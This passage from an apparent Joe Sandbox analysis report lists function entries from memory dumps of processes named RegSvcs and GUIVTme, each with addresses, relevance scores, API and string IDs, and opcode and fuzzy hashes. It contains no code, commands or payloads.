                                                                      • Opcode Fuzzy Hash: d8cb315835c7541a73103a56a310461d5483466ca3ec1de1cded4be192293630
                                                                      • Instruction Fuzzy Hash: 571144B1C0061A9BCB14CF9AD545B9EFBF4FF88324F15816AD818B7240D378A944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05CDE5A0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1963 5cde5a0-5cde5de 1965 5cde5e6-5cde614 GlobalMemoryStatusEx 1963->1965 1966 5cde61d-5cde645 1965->1966 1967 5cde616-5cde61c 1965->1967 1967->1966
                                                                      APIs
                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 05CDE607
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.3251996337.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_5cd0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID:
                                                                      • API String ID: 1890195054-0
                                                                      • Opcode ID: 39820414cbd95fb840f53fb6ec0dfdabfd245fed689bc7bc241ade21af4494db
                                                                      • Instruction ID: e5dd877e6badc4a3f1294fce8b02838b361f600a445769c101c02418f7df522b
                                                                      • Opcode Fuzzy Hash: 39820414cbd95fb840f53fb6ec0dfdabfd245fed689bc7bc241ade21af4494db
                                                                      • Instruction Fuzzy Hash: 6F1120B1C0065A9BCB10CF9AD444BDEFBF8BF88320F15816AD818A7240D378A944CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0157D01C Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.3245398258.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_157d000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 474930236cdf39894f9490c01572976d126585e13520df2c53e85c146868dfae
                                                                      • Instruction ID: b78ad0a58d21ed6ec5f6bd56492688ef652a3a8d799060debb5e239e3f93a85c
                                                                      • Opcode Fuzzy Hash: 474930236cdf39894f9490c01572976d126585e13520df2c53e85c146868dfae
                                                                      • Instruction Fuzzy Hash: 262100B5604200DFDB16DF58E985B2ABBB5FF84314F24C96DD80A0F246D33AD407CA61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0157D006 Relevance: .1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.3245398258.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_157d000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cfb1d99e79867c3a071e02af9b262a0390457b926817d08ef70b20d581121e80
                                                                      • Instruction ID: 2aebacf81efb1a1ac2198e4ff09d0027c67696e39177e522c69fbe722ccbc2b3
                                                                      • Opcode Fuzzy Hash: cfb1d99e79867c3a071e02af9b262a0390457b926817d08ef70b20d581121e80
                                                                      • Instruction Fuzzy Hash: 412159755093808FDB03CF24D994B15BF71AF46214F28C5AAD8498F6A7C33A980ACB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      Function 01491340 Relevance: 1.9, Strings: 1, Instructions: 603COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8gq
                                                                      • API String ID: 0-1984363304
                                                                      • Opcode ID: 3a2e20dcf178df4816877fd2654bef5b56a9c362e5e28f3cb871fcbeadb083b6
                                                                      • Instruction ID: 14404594a35f83a27ed28c9d8bd8a0c8d8d2b375eda433d991ed581259d7fae4
                                                                      • Opcode Fuzzy Hash: 3a2e20dcf178df4816877fd2654bef5b56a9c362e5e28f3cb871fcbeadb083b6
                                                                      • Instruction Fuzzy Hash: 1232B438B00602CFDB25DF38E49462A7BB2FBC9755B14846ED4068B3A5DB35EC46CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01491230 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: tPcq
                                                                      • API String ID: 0-3229073321
                                                                      • Opcode ID: e061df67cce919e3517e5f94f2fbf21d23252d51d88c49a29fd7b15d15efcd03
                                                                      • Instruction ID: 323d7022b8b20465f77238ebcf200dd977d106be385fc953b5b3a283e74d78b9
                                                                      • Opcode Fuzzy Hash: e061df67cce919e3517e5f94f2fbf21d23252d51d88c49a29fd7b15d15efcd03
                                                                      • Instruction Fuzzy Hash: FB3116717006228FCB58AB38C45882D7BF2AF8A62535108B9E506CF775DA36DC42CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01491240 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: tPcq
                                                                      • API String ID: 0-3229073321
                                                                      • Opcode ID: 38a15fa6f4f7e028ebbcd14b330e48d8203c6a53e84bb19078de3a0fbf75e8bd
                                                                      • Instruction ID: fd649643495da1941d5ee64c59f81ec2cbadc7c40da2697ed7ab4f94aba63045
                                                                      • Opcode Fuzzy Hash: 38a15fa6f4f7e028ebbcd14b330e48d8203c6a53e84bb19078de3a0fbf75e8bd
                                                                      • Instruction Fuzzy Hash: AB21D475701622CFCB58AB79C55881D7BB2AF89A2636108B8E506CF775DE36DC42CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01490BC0 Relevance: .3, Instructions: 336COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6e956a184b46b47781992863baa9f001e218b92f9333e2dffaaf4fe916f3f1b5
                                                                      • Instruction ID: e5edc7d298e2e32b2298103a3f27ec8f2d0a03948659f52e89e58deef26beb44
                                                                      • Opcode Fuzzy Hash: 6e956a184b46b47781992863baa9f001e218b92f9333e2dffaaf4fe916f3f1b5
                                                                      • Instruction Fuzzy Hash: 6081AF39A00705CFDB25DB78D41869EBFB2EF88310F19856AE506A7274DB34AC85CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01491C00 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d60f0c36f7ce8e9a64da23fb7e12d370d31b3f66176adb227df6e7c754c5f85a
                                                                      • Instruction ID: 20a782b4ddaad7aae35556e666cbe81975987b9cbcf69575d1bf81f97f4f0d45
                                                                      • Opcode Fuzzy Hash: d60f0c36f7ce8e9a64da23fb7e12d370d31b3f66176adb227df6e7c754c5f85a
                                                                      • Instruction Fuzzy Hash: 5511A07AE00206DFCB40DFB8D8449EAFBF1FF9931071081AAE515D7221E7349955CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01491C10 Relevance: .0, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 11d55ef030bbccdc53aa1b5ef69f1967d04b252d478d4b950c332ce2d22b5198
                                                                      • Instruction ID: e7d1aeb34358efd1f002145390dc9e7bb93c260142297a44f37c8e7a47e08090
                                                                      • Opcode Fuzzy Hash: 11d55ef030bbccdc53aa1b5ef69f1967d04b252d478d4b950c332ce2d22b5198
                                                                      • Instruction Fuzzy Hash: 43019276F00206DFCB00DFB9D84489BFBF5FF8835071081AAE51997220E734A915CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01490880 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2786c3dde9bf35b8cd40b0460888471464b8c0486ecbdbb54726bbc48b46f861
                                                                      • Instruction ID: bec6c5ea8bd35bed7ab98d3a7d5001cc266dd4a93c8b79ef9dc61dc12d456f0e
                                                                      • Opcode Fuzzy Hash: 2786c3dde9bf35b8cd40b0460888471464b8c0486ecbdbb54726bbc48b46f861
                                                                      • Instruction Fuzzy Hash: 9BF0CD70D0E3969FCBE19FB498050DABFF4EA12320B0801ABD4C9D3112E2380D14CB93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01490F9D Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 300af409e69a7448dafb550ca5b28b8407b9b02bcaf4409761f4eb42809b089a
                                                                      • Instruction ID: 7473760b94af85eab1bc61bb6305033e922e0e9ad97a39b7d35860da44744824
                                                                      • Opcode Fuzzy Hash: 300af409e69a7448dafb550ca5b28b8407b9b02bcaf4409761f4eb42809b089a
                                                                      • Instruction Fuzzy Hash: 1CF01CB5A00306DFDB24DBA4C15979E7FB0AB48B24F28089AD402A73B4DBB48C84CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01491AE0 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 684af0fa926865a08d2b63e9f5204c5ae4c5d28485d7a4e29643c9f4d7f6879b
                                                                      • Instruction ID: 10f32281d566a05c4e7c4649157bba73edd86d1201f10f6edbdbe6e2b18a4b8a
                                                                      • Opcode Fuzzy Hash: 684af0fa926865a08d2b63e9f5204c5ae4c5d28485d7a4e29643c9f4d7f6879b
                                                                      • Instruction Fuzzy Hash: F7D05B357002149FD714DB79F949A463B78EF49651F514095EA04CB364EB71DC14C7D1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 014908A8 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2180694168.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_1490000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e0744fedb35c54bea5920b3c9dad942c16632b89800126c0c0580a64c8bca18c
                                                                      • Instruction ID: 35ef5f8a522a2d77caa2c7fb3d64b2d4bbd3c03e594619518cebeda36dd9ecaa
                                                                      • Opcode Fuzzy Hash: e0744fedb35c54bea5920b3c9dad942c16632b89800126c0c0580a64c8bca18c
                                                                      • Instruction Fuzzy Hash: 90D067B5D05219AF8F50EFF999051DEBBF8EE09250B104566D91DE7204E6705A108BD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      Function 00691340 Relevance: 11.8, Strings: 9, Instructions: 600COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8gq$D@d$D@d$D@d$D@d$D@d$D@d$D@d$D@d
                                                                      • API String ID: 0-3965891166
                                                                      • Opcode ID: 4a0a852dd1a97a646a98e3a3f0d3203a3b75ffecbe202f289417ab06b95adb2d
                                                                      • Instruction ID: 1ec793ed95f704c4cbafecc5c138fd2f2062f7647979ae6c39e8f7c7f81188b1
                                                                      • Opcode Fuzzy Hash: 4a0a852dd1a97a646a98e3a3f0d3203a3b75ffecbe202f289417ab06b95adb2d
                                                                      • Instruction Fuzzy Hash: 63327F38B00202CFDB15EF74D89466A77BBBB86315F208968D4069B799EF31EC46CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00690BC0 Relevance: 1.6, Strings: 1, Instructions: 335COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: D@d
                                                                      • API String ID: 0-846468682
                                                                      • Opcode ID: eccf913a18b5146ed2ccf2b619c8bee210910b52fa0283354aa0f71ca33fb43c
                                                                      • Instruction ID: e5a5b543d6999cb56adfc04c79a76075f13c7581ff892ab3deb986a828195792
                                                                      • Opcode Fuzzy Hash: eccf913a18b5146ed2ccf2b619c8bee210910b52fa0283354aa0f71ca33fb43c
                                                                      • Instruction Fuzzy Hash: F081C139A00305CFDB16AFB4C85869ABBF7EF89310F148569E406A77A4DF34AC95CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00691230 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: tPcq
                                                                      • API String ID: 0-3229073321
                                                                      • Opcode ID: 2d86e09a2c370a3112022c16bd29662b2e6fc8b577e60da936b052bf5a2ef10d
                                                                      • Instruction ID: bb28cc21594e40f1446e36b3b2b7bb59024ad1ae4461a58a3a3703183c92bc73
                                                                      • Opcode Fuzzy Hash: 2d86e09a2c370a3112022c16bd29662b2e6fc8b577e60da936b052bf5a2ef10d
                                                                      • Instruction Fuzzy Hash: 8E3104757006228FCB59AB38C45891D7BF6AF8A72676108B8E406CF775DE36DC42CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00691240 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: tPcq
                                                                      • API String ID: 0-3229073321
                                                                      • Opcode ID: 596ad29d683ffdab8107bfe2893f9bbed1a88741eefe9421318356db7530b15d
                                                                      • Instruction ID: 64051e28a38cfc17c86dc72aae278b9c145f9e5b76f5bcea51147f0973548292
                                                                      • Opcode Fuzzy Hash: 596ad29d683ffdab8107bfe2893f9bbed1a88741eefe9421318356db7530b15d
                                                                      • Instruction Fuzzy Hash: 1521D4757016228FCB58AB78C55881D7BB6AF8A71636108B8E506CF775DE36DC42CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00691C10 Relevance: .0, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: db27c7141f9c8cb3960bcfb5584d49f2d6d3caa6cfa40891eb4cc47b1dba1bb8
                                                                      • Instruction ID: 9e813630dd673236259b75f1fc0b8bbd597627dbe2ea41fb774f3b1af2d87df5
                                                                      • Opcode Fuzzy Hash: db27c7141f9c8cb3960bcfb5584d49f2d6d3caa6cfa40891eb4cc47b1dba1bb8
                                                                      • Instruction Fuzzy Hash: 6A01B57AE002069FCB40EFB4D88489FFBF5FF89310710856AE519E7225EB30A915CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00690F9D Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 00c1551ec99c616a0752577b8cefd5023628e74c0ae945558346ac96452fddd1
                                                                      • Instruction ID: 2fe446bd0a687e5e8bd6b3fa07d029c0dfbb22e95835dbd30f1e2c1c7dc9b2dc
                                                                      • Opcode Fuzzy Hash: 00c1551ec99c616a0752577b8cefd5023628e74c0ae945558346ac96452fddd1
                                                                      • Instruction Fuzzy Hash: 48F01579A00306DFDF24DBA4C5597AD7BF2AB49714F250899D402AB7A0DBB48C84CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00690898 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b6f0171f26bafc40235169c3ca4508235037bca43737ff15017d97b3dc84319e
                                                                      • Instruction ID: 21b0d94d4d0701b9bbf8fc0baca8131d774e897c85d3a14899348b1874e23a1e
                                                                      • Opcode Fuzzy Hash: b6f0171f26bafc40235169c3ca4508235037bca43737ff15017d97b3dc84319e
                                                                      • Instruction Fuzzy Hash: E5E01AB1D01219AF8B809FA8A9052DE7BF9FE09310B110062DA09E7200E7705A058BE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00691AE0 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 322a80dfbee78b0a6a39f85d5685d9f5eb3f3618ec2a36df54f80914d268dfde
                                                                      • Instruction ID: 38e88671573cb523f80072b45512173ffcd4e704357c62383c317a2ae9cfb0ec
                                                                      • Opcode Fuzzy Hash: 322a80dfbee78b0a6a39f85d5685d9f5eb3f3618ec2a36df54f80914d268dfde
                                                                      • Instruction Fuzzy Hash: 7DD012397102149FC714EB65E949A85377DEB0A711F504095E504CB254EB61EC14C7E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 006908A8 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2267577064.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_690000_GUIVTme.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2fa04506a471fd2ff553c161a0db1c9f890c1ba55689ea9cc824d39a72eea72c
                                                                      • Instruction ID: 58db5ca8b7704a0431d9a3347963df349c7f15820adff125dd5224e5822a6483
                                                                      • Opcode Fuzzy Hash: 2fa04506a471fd2ff553c161a0db1c9f890c1ba55689ea9cc824d39a72eea72c
                                                                      • Instruction Fuzzy Hash: 25D067B5D01219AF8F40EFF999062DEBBF8FE09250B104566D919E3600E6705A108BD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%